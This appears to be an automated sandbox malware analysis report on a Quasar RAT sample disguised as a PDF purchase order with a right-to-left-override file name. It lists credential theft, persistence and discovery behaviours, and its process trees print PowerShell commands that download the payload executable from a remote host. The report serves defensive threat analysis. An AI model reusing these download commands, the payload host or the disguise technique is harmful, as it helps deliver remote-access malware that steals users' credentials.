Malware Analysis Report

2024-10-19 08:35

Sample ID 240729-h13nhsscrc
Target jdconstructnOrder‮fdp..exe
SHA256 8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3
Tags
discovery execution quasar office04 credential_access persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3

Threat Level: Known bad

The file jdconstructnOrder‮fdp..exe was found to be: Known bad.

Malicious Activity Summary

discovery execution quasar office04 credential_access persistence spyware stealer trojan

Quasar payload

Quasar RAT

Credentials from Password Stores: Credentials from Web Browsers

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Reads user/profile data of web browsers

Reads WinSCP keys stored on the system

Checks computer location settings

.NET Reactor proctector

Executes dropped EXE

Adds Run key to start application

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-29 07:13

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-29 07:13

Reported

2024-07-29 07:17

Platform

win7-20240704-en

Max time kernel

117s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe

"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8298.tmp\8299.tmp\829A.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\8298.tmp\8299.tmp\829A.bat

MD5 9aaac0122442ca0ebb4d8bb795e86676
SHA1 594744d8e4d51273dd435c3fac5799bc5f180e8c
SHA256 6af7e75e339241dac26eca99aa1290c1f420b45b4231212d20adf08aa287e373
SHA512 d08a0dd3b40d80c7582c3f69a7868371e7eb03ac6f4658a39e7a9fb1dd34cc22a5e91d60b31af71c77cebfe0fd0c3827fdbb3cc35224189388345c61e756636c

memory/2748-6-0x000007FEF56DE000-0x000007FEF56DF000-memory.dmp

memory/2748-7-0x000000001B540000-0x000000001B822000-memory.dmp

memory/2748-8-0x0000000002310000-0x0000000002318000-memory.dmp

memory/2748-9-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2748-10-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2748-11-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2748-12-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2748-13-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 cb03fc5057bb504c410d7dfc9340cec0
SHA1 688aa6bf36b4f06bee011d9cfe74e90b8e671b1e
SHA256 184994eef087e2619c0725840ca43212800b62b32774d2a5be254986e36dd7f7
SHA512 d897eb6a3dfc04f9fa29b7e7e3f73f191d9ee70d74a299de95a4c27a723c94aef3c41cc795b1c52108bfb73c92ecc8e72d36f56c07b510c35923d6081de77641

memory/2640-19-0x000000001B600000-0x000000001B8E2000-memory.dmp

memory/2640-20-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-29 07:13

Reported

2024-07-29 07:16

Platform

win10v2004-20240709-en

Max time kernel

148s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkRun.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\networkrunfdp.exe" C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe

"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A6DF.tmp\A6E0.tmp\A6F0.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrder‮fdp..exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"

C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe

networkrunfdp.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 jdvdpconstructionltdfileportal.replit.app udp
US 34.117.33.233:443 jdvdpconstructionltdfileportal.replit.app tcp
US 8.8.8.8:53 233.33.117.34.in-addr.arpa udp
US 34.117.33.233:443 jdvdpconstructionltdfileportal.replit.app tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 oshi.at udp
CZ 194.15.112.248:443 oshi.at tcp
US 8.8.8.8:53 248.112.15.194.in-addr.arpa udp
US 192.228.105.2:4782 tcp
US 8.8.8.8:53 ipwho.is udp
DE 195.201.57.90:443 ipwho.is tcp
US 8.8.8.8:53 2.105.228.192.in-addr.arpa udp
US 8.8.8.8:53 90.57.201.195.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\A6DF.tmp\A6E0.tmp\A6F0.bat

MD5 9aaac0122442ca0ebb4d8bb795e86676
SHA1 594744d8e4d51273dd435c3fac5799bc5f180e8c
SHA256 6af7e75e339241dac26eca99aa1290c1f420b45b4231212d20adf08aa287e373
SHA512 d08a0dd3b40d80c7582c3f69a7868371e7eb03ac6f4658a39e7a9fb1dd34cc22a5e91d60b31af71c77cebfe0fd0c3827fdbb3cc35224189388345c61e756636c

memory/764-2-0x00007FFF64FD3000-0x00007FFF64FD5000-memory.dmp

memory/764-3-0x00000225933D0000-0x00000225933F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gjyejjjp.zyp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/764-13-0x00007FFF64FD0000-0x00007FFF65A91000-memory.dmp

memory/764-14-0x00007FFF64FD0000-0x00007FFF65A91000-memory.dmp

memory/764-18-0x00007FFF64FD0000-0x00007FFF65A91000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6f857cbceb4b48c43f2483798a60bce7
SHA1 2945024e9161f9971d24c3d5042b614c781ed03a
SHA256 0886411b6e8582aced80f9bd6269d6821c06750180e85b50adb99ec8c4b867ae
SHA512 26db2e395d9b1b856ac4401d6576d5fa0631a7d0696c930ca1f683ec1812cc27406ff8c42f0538fd5e445d46f20aa68b826daf69738dd2647d1b8bea5a85c057

C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe

MD5 a18b7de2990becc30f700720e19ebfef
SHA1 b48c1a5c7756bccfe05d7999daeb96e7ab688cfd
SHA256 2bf98c947ce0bd8e6e6a0c0493af056790d61ab86c7c47896b4688bdc60b68b5
SHA512 484f8faf3973b74c96b6fea157774c627044fa4631e127de30f9f93468d38e73befa3c3bff3ea07108c82d943c9b56e79c5d6391d0e3a9b197869b0715d2808b

memory/1076-35-0x0000000000870000-0x00000000008DE000-memory.dmp

memory/1076-42-0x0000000005C10000-0x0000000005F35000-memory.dmp

memory/1076-43-0x0000000006680000-0x00000000069A4000-memory.dmp

memory/1076-44-0x0000000006F50000-0x00000000074F4000-memory.dmp

memory/1076-45-0x0000000006440000-0x00000000064D2000-memory.dmp

memory/1076-46-0x00000000064E0000-0x00000000064EA000-memory.dmp

memory/1076-47-0x0000000006600000-0x0000000006650000-memory.dmp

memory/1076-48-0x0000000006D50000-0x0000000006E02000-memory.dmp

memory/1076-49-0x0000000007B20000-0x0000000008138000-memory.dmp

memory/1076-50-0x0000000007870000-0x0000000007882000-memory.dmp

memory/1076-51-0x00000000078D0000-0x000000000790C000-memory.dmp

memory/1076-52-0x0000000007980000-0x00000000079E6000-memory.dmp